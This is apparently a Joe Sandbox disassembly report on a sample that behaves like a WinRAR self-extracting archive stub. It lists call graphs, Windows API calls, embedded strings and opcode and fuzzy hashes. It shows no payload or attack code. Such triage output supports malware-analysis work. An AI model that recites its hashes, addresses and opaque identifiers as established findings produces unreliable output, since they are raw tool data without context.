24476->24479 24657 35a544 CompareStringW SetCurrentDirectoryW ___scrt_fastfail 24476->24657 24478 35d7ea DeleteObject 24480 35d806 24478->24480 24481 35d7ff DeleteObject 24478->24481 24479->24478 24482 35d837 24480->24482 24483 35d849 24480->24483 24481->24480 24658 35d2e6 6 API calls 24482->24658 24654 35a39d 24483->24654 24485 35d83d CloseHandle 24485->24483 24487 35d883 24488 36757e GetModuleHandleW 24487->24488 24489 35ebcf 24488->24489 24489->24408 24490 3676a7 24489->24490 24794 367424 24490->24794 24493->24390 24494->24398 24495->24410 24496->24397 24497->24416 24499 36201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24498->24499 24511 36310e 24499->24511 24502 362029 24502->24418 24504 362031 24505 36203c 24504->24505 24525 36314a DeleteCriticalSection 24504->24525 24505->24418 24553 36b73a 24507->24553 24510 36203f 8 API calls 3 library calls 24510->24419 24512 363117 24511->24512 24514 363140 24512->24514 24515 362025 24512->24515 24526 363385 24512->24526 24531 36314a DeleteCriticalSection 24514->24531 24515->24502 24517 36215c 24515->24517 24546 36329a 24517->24546 24519 362166 24524 362171 24519->24524 24551 363348 6 API calls try_get_function 24519->24551 24521 36217f 24522 36218c 24521->24522 24552 36218f 6 API calls ___vcrt_FlsFree 24521->24552 24522->24504 24524->24504 24525->24502 24532 363179 24526->24532 24529 3633bc InitializeCriticalSectionAndSpinCount 24530 3633a8 24529->24530 24530->24512 24531->24515 24533 3631ad 24532->24533 24536 3631a9 24532->24536 24533->24529 24533->24530 24534 3631cd 24534->24533 24537 3631d9 GetProcAddress 24534->24537 24536->24533 24536->24534 24539 363219 24536->24539 24538 3631e9 __crt_fast_encode_pointer 24537->24538 24538->24533 24540 363236 24539->24540 24541 363241 LoadLibraryExW 24539->24541 24540->24536 24542 363275 24541->24542 24543 36325d GetLastError 24541->24543 24542->24540 24545 36328c FreeLibrary 24542->24545 24543->24542 24544 363268 LoadLibraryExW 24543->24544 
24544->24542 24545->24540 24547 363179 try_get_function 5 API calls 24546->24547 24548 3632b4 24547->24548 24549 3632cc TlsAlloc 24548->24549 24550 3632bd 24548->24550 24550->24519 24551->24521 24552->24524 24556 36b753 24553->24556 24554 35ec4a TranslatorGuardHandler 5 API calls 24555 35e5ee 24554->24555 24555->24422 24555->24510 24556->24554 24558 35f033 GetStartupInfoW 24557->24558 24558->24435 24559->24440 24561 35e360 24560->24561 24562 3500d9 GetModuleHandleW 24561->24562 24563 350154 24562->24563 24564 3500f0 GetProcAddress 24562->24564 24565 350484 GetModuleFileNameW 24563->24565 24668 3670dd 42 API calls 2 library calls 24563->24668 24566 350121 GetProcAddress 24564->24566 24567 350109 24564->24567 24578 3504a3 24565->24578 24566->24563 24569 350133 24566->24569 24567->24566 24569->24563 24570 3503be 24570->24565 24571 3503c9 GetModuleFileNameW CreateFileW 24570->24571 24572 3503fc SetFilePointer 24571->24572 24573 350478 CloseHandle 24571->24573 24572->24573 24574 35040c ReadFile 24572->24574 24573->24565 24574->24573 24576 35042b 24574->24576 24576->24573 24580 350085 2 API calls 24576->24580 24579 3504d2 CompareStringW 24578->24579 24581 350508 GetFileAttributesW 24578->24581 24582 350520 24578->24582 24659 34acf5 24578->24659 24662 350085 24578->24662 24579->24578 24580->24576 24581->24578 24581->24582 24583 35052a 24582->24583 24585 350560 24582->24585 24586 350542 GetFileAttributesW 24583->24586 24588 35055a 24583->24588 24584 35066f 24608 359da4 GetCurrentDirectoryW 24584->24608 24585->24584 24587 34acf5 GetVersionExW 24585->24587 24586->24583 24586->24588 24589 35057a 24587->24589 24588->24585 24590 3505e7 24589->24590 24591 350581 24589->24591 24592 34400a _swprintf 51 API calls 24590->24592 24593 350085 2 API calls 24591->24593 24594 35060f AllocConsole 24592->24594 24595 35058b 24593->24595 24596 350667 ExitProcess 24594->24596 24597 35061c GetCurrentProcessId AttachConsole 24594->24597 24598 350085 2 API calls 24595->24598 24669 3635b3 

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 003500CF: GetModuleHandleW.KERNEL32(kernel32), ref: 003500E4
                                      • Part of subcall function 003500CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003500F6
                                      • Part of subcall function 003500CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00350127
                                      • Part of subcall function 00359DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00359DAC
                                      • Part of subcall function 0035A335: OleInitialize.OLE32(00000000), ref: 0035A34E
                                      • Part of subcall function 0035A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0035A385
                                      • Part of subcall function 0035A335: SHGetMalloc.SHELL32(00388430), ref: 0035A38F
                                      • Part of subcall function 003513B3: GetCPInfo.KERNEL32(00000000,?), ref: 003513C4
                                      • Part of subcall function 003513B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 003513D8
                                    • GetCommandLineW.KERNEL32 ref: 0035D61C
                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0035D643
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0035D654
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0035D68E
                                      • Part of subcall function 0035D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0035D29D
                                      • Part of subcall function 0035D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0035D2D9
                                    • CloseHandle.KERNEL32(00000000), ref: 0035D697
                                    • GetModuleFileNameW.KERNEL32(00000000,0039DC90,00000800), ref: 0035D6B2
                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0039DC90), ref: 0035D6BE
                                    • GetLocalTime.KERNEL32(?), ref: 0035D6C9
                                    • _swprintf.LIBCMT ref: 0035D708
                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0035D71A
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0035D721
                                    • LoadIconW.USER32(00000000,00000064), ref: 0035D738
                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0035D789
                                    • Sleep.KERNEL32(?), ref: 0035D7B7
                                    • DeleteObject.GDI32 ref: 0035D7F0
                                    • DeleteObject.GDI32(?), ref: 0035D800
                                    • CloseHandle.KERNEL32 ref: 0035D843
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj9
                                    • API String ID: 788466649-1674459912
                                    • Opcode ID: 30228e8e9635661d94b0144de3c4d151352b0a4284c3b9dd3542766570bfce9b
                                    • Instruction ID: eeef26901c20b0bcfae1fe20e5955e9b1c26c65e9d0ef0a96f2d64f683f6d9af
                                    • Opcode Fuzzy Hash: 30228e8e9635661d94b0144de3c4d151352b0a4284c3b9dd3542766570bfce9b
                                    • Instruction Fuzzy Hash: 1561D271900340AFD733AFA6EC4AF6B37ACAB45742F400469F949972B1DB749948CB62

                                    Control-flow Graph

                                    APIs
                                    • FindResourceW.KERNEL32(0035AE4D,PNG,?,?,?,0035AE4D,00000066), ref: 00359E2E
                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0035AE4D,00000066), ref: 00359E46
                                    • LoadResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E59
                                    • LockResource.KERNEL32(00000000,?,?,?,0035AE4D,00000066), ref: 00359E64
                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0035AE4D,00000066), ref: 00359E82
                                    • GlobalLock.KERNEL32(00000000), ref: 00359E93
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00359EB7
                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00359EFC
                                    • GlobalUnlock.KERNEL32(00000000), ref: 00359F1B
                                    • GlobalFree.KERNEL32(00000000), ref: 00359F22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                    • String ID: PNG
                                    • API String ID: 3656887471-364855578
                                    • Opcode ID: 176693d47d8070a36bf76ff4a16cf76ec5b6a66ef4149c7d051e7b304e982fa6
                                    • Instruction ID: 8386be7f5715df5dee632c9e666494ed4fb3048719822e5a7a0b80332f59be95
                                    • Opcode Fuzzy Hash: 176693d47d8070a36bf76ff4a16cf76ec5b6a66ef4149c7d051e7b304e982fa6
                                    • Instruction Fuzzy Hash: E3316D71204712ABC7229F25EC48E2BBBADFF89752F050929FC06D6260DB31D8489B61

                                    Control-flow Graph

                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A628
                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A65E
                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A66A
                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A692
                                    • GetLastError.KERNEL32(?,?,?,?,0034A4EF,000000FF,?,?), ref: 0034A69E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FileFind$ErrorFirstLast$Next
                                    • String ID:
                                    • API String ID: 869497890-0
                                    • Opcode ID: 7f2e8660b28b2676efbf3ce865e844d4c859064fc76a08e7f308ebbbc8118ddf
                                    • Instruction ID: 3c406d1cf2c14ef7d35bd12b54b3f99d761b2ac598233c4e536f7dd933234a9a
                                    • Opcode Fuzzy Hash: 7f2e8660b28b2676efbf3ce865e844d4c859064fc76a08e7f308ebbbc8118ddf
                                    • Instruction Fuzzy Hash: C641B372504641AFC326EF68C8C4ADAF7ECBF48340F050A2AF999D7210D734B9588B92
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002,00000000), ref: 0036755E
                                    • TerminateProcess.KERNEL32(00000000,?,00367513,00000000,0037BAD8,0000000C,0036766A,00000000,00000002,00000000), ref: 00367565
                                    • ExitProcess.KERNEL32 ref: 00367577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 86dfcf4a4617571df45bba493ca915e02b0b542d4c0979a96a6dc627f33b2db9
                                    • Instruction ID: f8edfa71ef13886b68c755e7cefd2b50a7356c654dd453b849c2a8a11a83ecd9
                                    • Opcode Fuzzy Hash: 86dfcf4a4617571df45bba493ca915e02b0b542d4c0979a96a6dc627f33b2db9
                                    • Instruction Fuzzy Hash: 3BE0B631004948EBCF23BF64DD09A493F69EB42745F518454FA4A9B236CB35DE92DA50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prolog_memcmp
                                    • String ID:
                                    • API String ID: 3004599000-0
                                    • Opcode ID: ffafab8f1135a6e7e3772fa8ea903ee898793992ffbd4e578a341294e82d97c3
                                    • Instruction ID: 1f890c6c5f8c11181b45ea6aea8d9614f8f97168eaee4ecb3d24a173c99a6415
                                    • Opcode Fuzzy Hash: ffafab8f1135a6e7e3772fa8ea903ee898793992ffbd4e578a341294e82d97c3
                                    • Instruction Fuzzy Hash: 1682EA70904245AEDF27DF64C895BFEB7E9AF05300F0945BAE9599F142DB307A88CB60
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035AEE5
                                      • Part of subcall function 0034130B: GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                      • Part of subcall function 0034130B: SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: H_prologItemTextWindow
                                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                    • API String ID: 810644672-3344487560
                                    • Opcode ID: 82dc0dbdc5a04af03954f3ac413aaa84b3b7041945cffa4c2f1ddf4db2dafe56
                                    • Instruction ID: f7c9c1c48f9a3d43c4518f811bcea157029d64c43df05448f89b9f049006b911
                                    • Opcode Fuzzy Hash: 82dc0dbdc5a04af03954f3ac413aaa84b3b7041945cffa4c2f1ddf4db2dafe56
                                    • Instruction Fuzzy Hash: 2342E971944344BEEB239B749C4AFBFB7BCAB06702F400195FA45AB1E1CB745948CB61

                                    Control-flow Graph

                                    APIs
                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 003500E4
                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003500F6
                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00350127
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003503D4
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003503F0
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00350402
                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00373BA4,00000000), ref: 00350421
                                    • CloseHandle.KERNEL32(00000000), ref: 00350479
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0035048F
                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 003504E7
                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00350510
                                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0035054A
                                      • Part of subcall function 00350085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003500A0
                                      • Part of subcall function 00350085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0034EB86,Crypt32.dll,00000000,0034EC0A,?,?,0034EBEC,?,?,?), ref: 003500C2
                                    • _swprintf.LIBCMT ref: 003505BE
                                    • _swprintf.LIBCMT ref: 0035060A
                                      • Part of subcall function 0034400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0034401D
                                    • AllocConsole.KERNEL32 ref: 00350612
                                    • GetCurrentProcessId.KERNEL32 ref: 0035061C
                                    • AttachConsole.KERNEL32(00000000), ref: 00350623
                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00350649
                                    • WriteConsoleW.KERNEL32(00000000), ref: 00350650
                                    • Sleep.KERNEL32(00002710), ref: 0035065B
                                    • FreeConsole.KERNEL32 ref: 00350661
                                    • ExitProcess.KERNEL32 ref: 00350669
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                    • String ID: <7$ ?7$(>7$(@7$0A7$4=7$8<7$<?7$@>7$@@7$D=7$DA7$DXGIDebug.dll$P<7$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;7$T?7$X>7$X@7$\A7$`=7$dwmapi.dll$kernel32$l<7$p>7$p?7$p@7$uxtheme.dll$x=7$|<7$>7$?7
                                    • API String ID: 1201351596-93022140
                                    • Opcode ID: cfedce31f368322ea6ea146d7f6a439f7c5e0679bc745edbdb06e63a66b27342
                                    • Instruction ID: 3fdb16587255a84d291ad31a6d1a51549c4110474eadc22cc47fbd44255150ac
                                    • Opcode Fuzzy Hash: cfedce31f368322ea6ea146d7f6a439f7c5e0679bc745edbdb06e63a66b27342
                                    • Instruction Fuzzy Hash: 2ED18FB5008384ABD3339F50D849F9FBAECAF85705F10891CF58D9A150D7B996489F63

                                    Control-flow Graph

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0035BDFA
                                      • Part of subcall function 0035AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0035AAFE
                                    • SetWindowTextW.USER32(?,?), ref: 0035C127
                                    • _wcsrchr.LIBVCRUNTIME ref: 0035C2B1
                                    • GetDlgItem.USER32(?,00000066), ref: 0035C2EC
                                    • SetWindowTextW.USER32(00000000,?), ref: 0035C2FC
                                    • SendMessageW.USER32(00000000,00000143,00000000,0038A472), ref: 0035C30A
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0035C335
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3564274579-312220925

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0034D346
                                    • _wcschr.LIBVCRUNTIME ref: 0034D367
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0034D328,?), ref: 0034D382
                                    • __fprintf_l.LIBCMT ref: 0034D873
                                      • Part of subcall function 0035137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0034B652,00000000,?,?,?,00010420), ref: 00351396
                                    Strings
                                    Similarity
                                    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                    • String ID: $ ,$$%s:$$97$*messages***$*messages***$@%s:$R$RTL$a
                                    • API String ID: 4184910265-625319642

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0035AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0035AC85
                                      • Part of subcall function 0035AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0035AC96
                                      • Part of subcall function 0035AC74: IsDialogMessageW.USER32(00010420,?), ref: 0035ACAA
                                      • Part of subcall function 0035AC74: TranslateMessage.USER32(?), ref: 0035ACB8
                                      • Part of subcall function 0035AC74: DispatchMessageW.USER32(?), ref: 0035ACC2
                                    • GetDlgItem.USER32(00000068,0039ECB0), ref: 0035CB6E
                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0035A632,00000001,?,?,0035AECB,00374F88,0039ECB0), ref: 0035CB96
                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0035CBA1
                                    • SendMessageW.USER32(00000000,000000C2,00000000,003735B4), ref: 0035CBAF
                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035CBC5
                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0035CBDF
                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035CC23
                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0035CC31
                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0035CC40
                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0035CC67
                                    • SendMessageW.USER32(00000000,000000C2,00000000,0037431C), ref: 0035CC76
                                    Strings
                                    Similarity
                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                    • String ID: \
                                    • API String ID: 3569833718-2967466578

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • ShellExecuteExW.SHELL32(?), ref: 0035CF54
                                    • ShowWindow.USER32(?,00000000), ref: 0035CF93
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0035CFCF
                                    • CloseHandle.KERNEL32(?), ref: 0035CFF5
                                    • ShowWindow.USER32(?,00000001), ref: 0035D084
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    Strings
                                    Similarity
                                    • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                    • String ID: $.exe$.inf
                                    • API String ID: 3686203788-2452507128

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00364E35,00364E35,?,?,?,0036A2A9,00000001,00000001,3FE85006), ref: 0036A0B2
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0036A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0036A138
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0036A232
                                    • __freea.LIBCMT ref: 0036A23F
                                      • Part of subcall function 00368518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036C13D,00000000,?,003667E2,?,00000008,?,003689AD,?,?,?), ref: 0036854A
                                    • __freea.LIBCMT ref: 0036A248
                                    • __freea.LIBCMT ref: 0036A26D
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000050), ref: 0035A2DE
                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0035A315
                                      • Part of subcall function 003517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0034BB05,00000000,.exe,?,?,00000800,?,?,003585DF,?), ref: 003517C2
                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0035A305
                                    Strings
                                    Similarity
                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                    • String ID: @Uxu$EDIT
                                    • API String ID: 4243998846-59804995

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,003478AD,?,00000005,?,00000011), ref: 00349A4C
                                    • GetLastError.KERNEL32(?,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349A59
                                    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003478AD,?,00000005,?), ref: 00349A8E
                                    • GetLastError.KERNEL32(?,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349A96
                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00349ADB
                                    Similarity
                                    • API ID: File$CreateErrorLast$Time
                                    • String ID:
                                    • API String ID: 1999340476-0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
